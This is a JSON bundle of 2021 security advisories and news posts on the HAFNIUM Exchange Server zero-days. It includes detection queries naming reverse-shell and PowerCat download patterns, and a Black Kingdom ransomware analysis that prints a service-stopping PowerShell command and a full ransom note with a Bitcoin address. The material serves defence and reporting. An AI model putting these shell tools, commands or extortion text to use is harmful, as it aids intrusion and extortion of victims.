\".txt\" | where FileName !endswith \".LOG\" | where FileName !endswith \".cfg\" | where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents | where InitiatingProcessFileName == \"UMWorkerProcess.exe\" | where FileName != \"wermgr.exe\" | where FileName != \"WerFault.exe\"`\n\nPlease note excessive spawning of wermgr.exe and WerFault.exe could be an indicator of compromise due to the service crashing during deserialization.\n\n### Azure Sentinel advanced hunting queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows Event Logging:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and Powershell command line logging in Windows Event Logs:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for Exchange PowerShell Snapin being loaded. This can be used to export mailbox data, subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent | where EventID == 4688 | where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") | where isnotempty(CommandLine) | where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" | summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\n \n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:07:53", "type": "mmpc", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MMPC:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "carbonblack": [{"lastseen": "2021-03-10T12:27:08", "description": "_The following advisory from VMware Threat Analysis Unit (TAU) is to provide guidance, best practices and capabilities to identify risk, prevent, detect and respond to this emerging threat._\n\n#### Summary\n\nOn March 2, 2021 Microsoft [announced](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) four zero-day vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) directly targeting Microsoft Exchange servers hosted locally.\n\nThese four zero-day vulnerabilities are chained together to gain access to Microsoft Exchange servers as an entry point to exfiltrate data and persist for malicious gain. In order for the attack to work the threat actor would need to access an on-premises Microsoft Exchange server via port 443. Once accessed, the threat actors will then utilize the above vulnerabilities to gain remote access.\n\nIt is best practice if you have Microsoft Exchange Server 2013, 2016, and/or Microsoft Exchange Server 2019 hosted locally to apply the updates provided by Microsoft immediately to protect against these exploits, with an emphasis on prioritizing externally facing Exchange servers.\n\n#### Threat Actor Attribution\n\nMicrosoft identified Hafnium, a state-sponsored threat actor that operates from China, as the group responsible for the recent attacks. Hafnium has also been reported to be responsible for other attacks on internet-facing servers and typically exfiltrate data to file sharing sites. After gaining access to a vulnerable workload, Hafnium will install a web shell that allows them to steal data, upload files, and execute almost any command. Hafnium will then perform a memory dump of an LSASS.exe executable to harvest cached credentials using this web shell. This will enable them export mailboxes and stolen data from the workload and upload it to file-sharing services, where they could later retrieve it.\n\n#### Detections and Recommended Response Actions\n\nThe Microsoft Exchange Server team has created a script to run a check for Hafnium IOCs to address performance and memory concerns. That script is available [here](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>).\n\nMicrosoft Senior Threat Intelligence Analyst [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1366858907671552005>) has created a [Nmap script](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nTo use the script, download it from his GitHub page and store it in /usr/share/nmap/scripts and then use the nmap -script http-vuln-exchange command.\n\nNmap script showing potentially vulnerable Microsoft Exchange server.\n\nOnce you have determined what Exchange servers need to be updated, you need to make sure your servers have a currently supported Cumulative Update (CU) and Update Rollup (RU) installed.\n\nAdministrators can find more information on the supported updates and how to install the patches in an [article from the Microsoft Exchange Team](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) published today.\n\n#### VMware Carbon Black Cloud Endpoint And Workload Protection Best Practices\n\n**Patch** \nPrioritize installing the recommended patches in your Microsoft Exchange environment as these vulnerabilities enable unauthenticated remote code execution and file-writes. If you are leveraging VMware Carbon Black Workload, you can quickly identify what assets have these critical exploitable CVE\u2019s within in your vCenter or within the VMware Carbon Black Cloud platform. In the platform, risk is prioritized based on how exploitable each CVE is.\n\n\n\n\n\n**Network** \nOur TAU also recommends implementing egress network ACLs for all externally facing web services in your environment.\n\n**Windows Operating Systems** \nVMware Carbon Black customers running the 3.6 sensor versions are protected out of the box without any need to configure rules relating to the post-compromise credential theft techniques disclosed. The latest versions of the VMware Carbon Black Cloud sensors will also detect and block suspect PowerShell usage typically associated with post-compromise behaviors using the AMSI detection capabilities.\n\nVMware Carbon Black Cloud customers utilizing NGAV and EDR detection analytics will generically identify and alert on behaviors associated with Web Shell activity, Reverse Shells, and unusual command interpreter behaviors.\n\n\n\nVMware TAU also recommends customers to enable the following Anti-Malware engine settings within the VMware Carbon Black Cloud console to ensure the best possible protection:\n\n * Delay executes for cloud scan\n * Submit unknown binaries for analysis\n\n_In order to take full advantage of the most up-to-date threat intelligence detection and prevention rules, customers must be running 3.6 or greater VMware Carbon Black Cloud sensor versions and running NGAV._\n\nThe post [TAU Threat Advisory: Microsoft Exchange Servers Targeted with Four Zero-day Exploits](<https://www.carbonblack.com/blog/tau-threat-advisory-microsoft-exchange-servers-targeted-with-four-zero-day-exploits/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-08T21:05:13", "type": "carbonblack", "title": "TAU Threat Advisory: Microsoft Exchange Servers Targeted with Four Zero-day Exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-08T21:05:13", "id": "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", "href": "https://www.carbonblack.com/blog/tau-threat-advisory-microsoft-exchange-servers-targeted-with-four-zero-day-exploits/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-03-10T12:47:11", "description": "**Microsoft Corp.** today released software updates to plug four security holes that attackers have been using to plunder email communications at companies that use its **Exchange Server** products. The company says all four flaws are being actively exploited as part of a complex attack chain deployed by a previously unidentified Chinese cyber espionage group.\n\n\n\nThe software giant typically releases security updates on the second Tuesday of each month, but it occasionally deviates from that schedule when addressing active attacks that target newly identified and serious vulnerabilities in its products.\n\nThe patches released today fix security problems in **Microsoft Exchange Server 2013**, **2016** and **2019**. Microsoft said its **Exchange Online** service -- basically hosted email for businesses -- is not impacted by these flaws.\n\nMicrosoft credited researchers at Reston, Va. based [Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) for reporting the attacks. Volexity **President Steven Adair** told KrebsOnSecurity it first spotted the attacks on Jan. 6, 2021.\n\nAdair said while the exploits used by the group may have taken great skills to develop, they require little technical know-how to use and can give an attacker easy access to all of an organization&#x27;s email if their vulnerable Exchange Servers are directly exposed to the Internet.\n\n&quot;These flaws are very easy to exploit,&quot; Adair said. &quot;You don&#x27;t need any special knowledge with these exploits. You just show up and say &#x27;I would like to break in and read all their email.&#x27; That&#x27;s all there is to it.&quot;\n\nMicrosoft says the flaws are being used by a previously unknown Chinese espionage group that&#x27;s been dubbed &quot;**Hafnium**,&quot; which is known to launch its attacks using hosting companies based in the United States.\n\n&quot;Hafnium primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs,&quot; Microsoft said. &quot;HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.&quot;\n\nAccording to Microsoft, Hafnium attackers have been observed combining all four zero-day flaws to target organizations running vulnerable Exchange Server products.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a &quot;server-side request forgery&quot; (SSRF) flaw, in which a server (in this case, an on-premises Exchange Server) can be tricked into running commands that it should never have been permitted to run, such as authenticating as the Exchange server itself.\n\nThe attackers used [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) to run code of their choice under the &quot;system&quot; account on a targeted Exchange server. The other two zero-day flaws -- [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) -- could allow an attacker to write a file to any part of the server.\n\nAfter exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised server, Microsoft said. Web shells are essentially software backdoors that allow attackers to steal data and perform additional malicious actions that lead to further compromise.\n\nNeither Microsoft nor Volexity is aware of publicly available code that would allow other cybercriminals to exploit these Exchange vulnerabilities. But given that these attacks are in the wild now, it may only be a matter of days before exploit code is publicly available online.\n\nMicrosoft stressed that the exploits detailed today were in no way connected to the [separate SolarWinds-related attacks](<https://krebsonsecurity.com/?s=solar+winds&x=0&y=0>). &quot;We continue to see no evidence that the actor behind SolarWinds discovered or exploited any vulnerability in Microsoft products and services,&quot; the company said.\n\nFurther reading:\n\n[Microsoft&#x27;s writeup on new Hafnium nation state cyberattacks](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>)\n\n[Microsoft technical advisory on the four Exchange Server flaws](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:19:17", "type": "krebs", "title": "Microsoft: Chinese Cyberspies Used 4 Exchange Server Flaws to Plunder Emails", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:19:17", "id": "KREBS:65D25A653F7348C7F18FFD951447B275", "href": "https://krebsonsecurity.com/2021/03/microsoft-chinese-cyberspies-used-4-exchange-server-flaws-to-plunder-emails/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2021-03-10T12:32:23", "description": "\n\n## What happened?\n\nOn March 2, 2021 several companies [released](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) [reports](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) about in-the-wild exploitation of zero-day vulnerabilities inside Microsoft Exchange Server. The following vulnerabilities allow an attacker to compromise a vulnerable Microsoft Exchange Server. As a result, an attacker will gain access to all registered email accounts, or be able to execute arbitrary code (remote code execution or RCE) within the Exchange Server context. In the latter case, the attacker will also be able to achieve persistence on the infected server.\n\nA total of four vulnerabilities were uncovered:\n\n 1. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). Server-side request forgery (SSRF) allows an attacker without authorization to query the server with a specially constructed request that will cause remote code execution. The exploited server will then forward the query to another destination. \n 2. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) caused by unsafe data deserialization inside the Unified Messaging service. Potentially allows an attacker to execute arbitrary code (RCE). As a result of insufficient control over user files, an attacker is able to forge a body of data query, and trick the high-privilege service into executing the code.\n 3. [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>). This vulnerability allows an authorized Exchange user to overwrite any existing file inside the system with their own data. To do so, the attacker has to compromise administrative credentials or exploit another vulnerability such as SSRF CVE-2021-26855.\n 4. [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is similar to CVE-2021-26858 and allows an authorized attacker to overwrite any system file on the Exchange server. \n\nKaspersky [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) shows that these vulnerabilities are already used by cybercriminals around the world.\n\n_Geography of attacks with mentioned MS Exchange vulnerabilities (based on KSN statistics) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>))_\n\nWe predict with a high degree of confidence that this is just the beginning, and we anticipate numerous exploitation attempts with the purpose of gaining access to resources inside corporate perimeters. Furthermore, we should note that there is typically a high risk of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) infection and/or data theft connected to such attacks. \n\n## How to protect against this threat?\n\nOur products protect against this threat with [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components and detect exploitation with the following verdict: PDM:Exploit.Win32.Generic \nWe detect the relevant exploits with the following detection names:\n\n * Exploit.Win32.CVE-2021-26857.gen\n * HEUR:Exploit.Win32.CVE-2021-26857.a\n\nWe also detect and block the payloads (backdoors) being used in the exploitation of these vulnerabilities, according to our Threat Intelligence. Possible detection names are (but not limited to):\n\n * HEUR:Trojan.ASP.Webshell.gen\n * HEUR:Backdoor.ASP.WebShell.gen\n * UDS:DangerousObject.Multi.Generic\n\nWe are actively monitoring the situation and additional detection logic will be released with updatable databases when required.\n\nOur [Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) helps to identify attacks in early stages by marking such suspicious actions with special IoA tags (and creating corresponding alerts). For example, this is an example of Powershell started by IIS Worker process (w3wp.exe) as a result of vulnerability exploitation: \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/07094546/microsoft_exchange_expoit_edr.png>)\n\nOur [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service is also able to identify and stop this attack by using threat hunting rules to spot the exploitation itself, as well as possible payload activity.\n\nAnd the thorough research of the attack will soon be available within APT Intelligence Reporting service, please contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>) for details.\n\n## Recommendations\n\n * As Microsoft has already released an update to fix all these vulnerabilities, we strongly recommend updating Exchange Server as soon as possible.\n * Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. Make sure you can quickly access it in an emergency.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and the [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service which help to identify and stop the attack in the early stages, before the attackers achieve their goals.\n * Use a reliable endpoint security solution such as Kaspersky Endpoint Security for Business that is powered by exploit prevention, behavior detection and a remediation engine that is able to roll back malicious actions. KESB also has self-defense mechanisms that can prevent its removal by cybercriminals.", "cvss3": {}, "published": "2021-03-04T17:20:57", "type": "securelist", "title": "Zero-day vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:20:57", "id": "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "href": "https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-17T10:31:39", "description": "\n\nBlack Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).\n\nThe complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and a possibility to recover files encrypted with Black Kingdom with the help of the hardcoded key. The industry already [provided a script](<https://blog.cyberint.com/black-kingdom-ransomware>) to recover encrypted files in case they were encrypted with the embedded key.\n\n## Background\n\nThe use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as [ProxyLogon](<https://proxylogon.com/>) was [publicly reported](<https://twitter.com/vikas891/status/1373282066603859969>) at the end of March.\n\nAround the same time, we published a story on another ransomware family used by the attackers after successfully exploiting vulnerabilities in Microsoft Exchange Server. The ransomware family was DearCry.\n\nAnalysis of Black Kingdom revealed that, compared to others, it is an amateurish implementation with several mistakes and a critical encryption flaw that could allow decrypting the files due to the use of a hardcoded key. Black Kingdom is not a new player: it was observed in action following other vulnerability exploitations in 2020, such as CVE-2019-11510.\n\n**Date** | **CVE** | **Product affected** \n---|---|--- \nJune 2020 | CVE-2019-11510 | Pulse Secure \nMarch 2021 | CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | Microsoft Exchange Server \n \n## Technical analysis\n\n### Delivery methods\n\nBlack Kingdom&#x27;s past activity indicates that ransomware was used in larger vulnerability exploitations campaigns related to Pulse Secure or Microsoft Exchange. [Public reports](<https://twitter.com/malwaretechblog/status/1373648027609657345>) indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.\n\n### Sleep parameters\n\nThe ransomware can be executed without parameters and will start to encrypt the system, however, it is possible to to run Black Kingdom with a number value, which it will interpret as the number of seconds to wait before starting encryption.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png>)\n\n**_&#x27;Sleep&#x27; parameter used as an argument_**\n\n### Ransomware is written in Python\n\nBlack Kingdom is coded in Python and compiled to an executable using PyInstaller. While analyzing the code statically, we found that most of the ransomware logic was coded into a file named _0xfff.py_. The ransomware is written in Python 3.7.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png>)\n\n**_Black Kingdom is coded in Python_**\n\n### Excluded directories\n\nThe adversary behind Black Kingdom specified certain folders to be excluded from encryption. The purpose is to avoid breaking the system during encryption. The list of excluded folders is available in the code:\n\n * Windows,\n * ProgramData,\n * Program Files,\n * Program Files (x86),\n * AppData/Roaming,\n * AppData/LocalLow,\n * AppData/Local.\n\nThe code that implements this functionality demonstrates how amateurishly Black Kingdom is written. The developers failed to use OS environments or regex to avoid repeating the code twice.\n\n### PowerShell command for process termination and history deletion\n\nPrior to file encryption, Black Kingdom uses PowerShell to try to stop all processes in the system that contain &quot;sql&quot; in the name with the following command:\n \n \n Get-Service*sql*|Stop-Service-Force2>$null\n\nOnce done, Black Kingdom will delete the PowerShell history in the system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png>)\n\n**_PowerShell commands run by Black Kingdom_**\n\nCombined with a cleanup of system logs, this supports the theory that the attackers try to remain hidden in the system by removing all traces of their activity.\n\n### Encryption process\n\nThe static analysis of Black Kingdom shows how it generates an AES-256 key based on the following algorithm.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png>)\n\n**_The pseudo-algorithm used by Black Kingdom_**\n\nThe malware generates a 64-character pseudo-random string. It then takes the MD5 hash of the string and uses it as the key for AES-256 encryption.\n\nThe code contains credentials for sending the generated key to the third-party service hxxp://mega.io. If the connection is unsuccessful, the Black Kingdom encrypts the data with a hardcoded key available in the code.\n\nBelow is an example of a successful connection with hxxp://mega.io.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png>)\n\n**_Connection established with mega.io_**\n\n** **The credentials for mega.io are hardcoded in base64 and used for connecting as shown below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png>)\n\n**_Hardcoded credentials_**\n\nThe file sent to Mega contained the following data.\n\n**Parameter** | **Description:** \n---|--- \nID: | Generated ID for user identification \nKey: | Generated user key \nUser: | Username in the infected system \nDomain: | Domain name to which the infected user belongs \n \nBlack Kingdom will encrypt a single file if it is passed as a parameter with the key to encrypt it. This could allow the attacker to encrypt one file instead of encrypting the entire system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png>)\n\n**_Function for encrypting a single file_**\n\nIf no arguments are used, the ransomware will start to enumerate files in the system and then encrypt these with a ten-threaded process. It performs the following basic operations:\n\n 1. Read the file,\n 2. Overwrite it with an encrypted version,\n 3. Rename the file.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png>)\n\n**_The function used for encrypting the system_**\n\nBlack Kingdom allows reading a file in the same directory called target.txt, which will be used by the ransomware to recursively collect files for the collected directories specified in that file and then encrypt them. Black Kingdom will also enumerate various drive letters and encrypt them. A rescue note will be delivered for each encrypted directory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png>)\n\n**_Rescue note used by the ransomware_**\n\n### Encryption mistakes\n\nAmateur ransomware developers often end up making mistakes that can help decryption, e.g., poor implementation of the encryption key, or, conversely, make recovery impossible even after the victim pays for a valid decryptor. Black Kingdom will try to upload the generated key to Mega, and if this fails, use a hardcoded key to encrypt the files. If the files have been encrypted and the system has not been able to make a connection to Mega, it will be possible to recover the files using the hardcoded keys.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png>)\n\n**_Hardcoded key in Base64_**\n\nWhile analyzing the code statically, we examined the author&#x27;s implementation of file encryption and found several mistakes that could affect victims directly. During the encryption process, Black Kingdom does not check whether the file is already encrypted or not. Other popular ransomware families normally add a specific extension or a marker to all encrypted files. However, if the system has been infected by Black Kingdom twice, files in the system will be encrypted twice, too, which may prevent recovery with a valid encryption key.\n\n### System log cleanup\n\nA feature of Black Kingdom is the ability to clean up system logs with a single Python function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png>)\n\n**_The function that cleans up system logs_**\n\nThis operation will result in Application, Security, and System event viewer logs being deleted. The purpose is to remove any history of ransomware activity, exploitation, and privilege escalation.\n\n### Ransomware note\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard with pyHook as it does so.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png>)\n\n**_Function to hook the mouse and keyboard_**\n\nWritten in English, the note contains several mistakes. All Black Kingdom notes contain the same Bitcoin address; sets it apart from other ransomware families, which provide a unique address to each victim.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nThe associated Bitcoin address is currently showing just two transactions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png>)\n\n**_Transactions made to a Bitcoin account_**\n\n### Code analysis\n\nAfter decompiling the Python code, we found that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on Github](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>).\n\nThe adversary behind Black Kingdom adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key or communication with the mega.io domain.\n\n## Victims\n\nBased on our telemetry we could see only a few hits by Black Kingdom in Italy and Japan.\n\n## Attribution\n\nWe could not attribute Black Kingdom to any known adversary in our case analysis. Its involvement in the Microsoft Exchange exploitation campaign suggests opportunism, rather than a resurgence in activity from this ransomware family.\n\nFor more information please contact: [financialintel@kaspersky.com](<mailto:financialintel@kaspersky.com>)\n\n## Appendix I \u2013 Indicators of Compromise\n\n**_Note:_**_ The indicators in this section were valid at the time of publication. Any future changes will be directly updated in the corresponding .ioc file._\n\n**File Hashes**\n\nb9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f \nc4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908 \na387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287 \n815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670 \n910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db 